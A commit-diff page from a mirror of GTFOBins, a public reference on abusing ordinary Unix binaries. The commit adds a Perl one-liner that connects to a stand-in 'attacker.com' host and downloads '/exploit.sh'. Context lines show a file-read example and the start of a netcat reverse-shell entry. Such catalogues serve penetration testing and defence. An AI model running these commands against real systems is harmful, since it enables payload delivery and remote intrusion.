public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-01-24 04:22:52 +01:00
Code Issues Projects Releases Wiki Activity

perl.md -- file download

Browse Source 
Add a file download example to perl gtfobin
This commit is contained in:
Dmitrijs Trizna 2023-10-05 11:42:09 +02:00 committed by GitHub
parent 72cb09f404
commit ec1c5c8849
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
_gtfobins/perl.md
View File

@ -6,6 +6,14 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
perl -ne print $LFILE perl -ne print $LFILE
file-download:
- description: Download a file via HTTP. For example, run `python3 -m http.server 8080` on the serving side.
code: |
export RHOST=attacker.com
export RPORT=8080
export URL=/exploit.sh
export LFILE=output.txt
perl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>$ENV{"RHOST"},PeerPort=>$ENV{"RPORT"},Proto=>"tcp") or die; print $s "GET " . $ENV{"URL"} . " HTTP/1.1\r\nHost: " . $ENV{"RHOST"} . "\r\nMetadata: true\r\nConnection: close\r\n\r\n"; open(my $fh, ">", $ENV{"LFILE"}) or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq "\r\n") { $in_content = 1; } } close($s); close($fh);'
reverse-shell: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |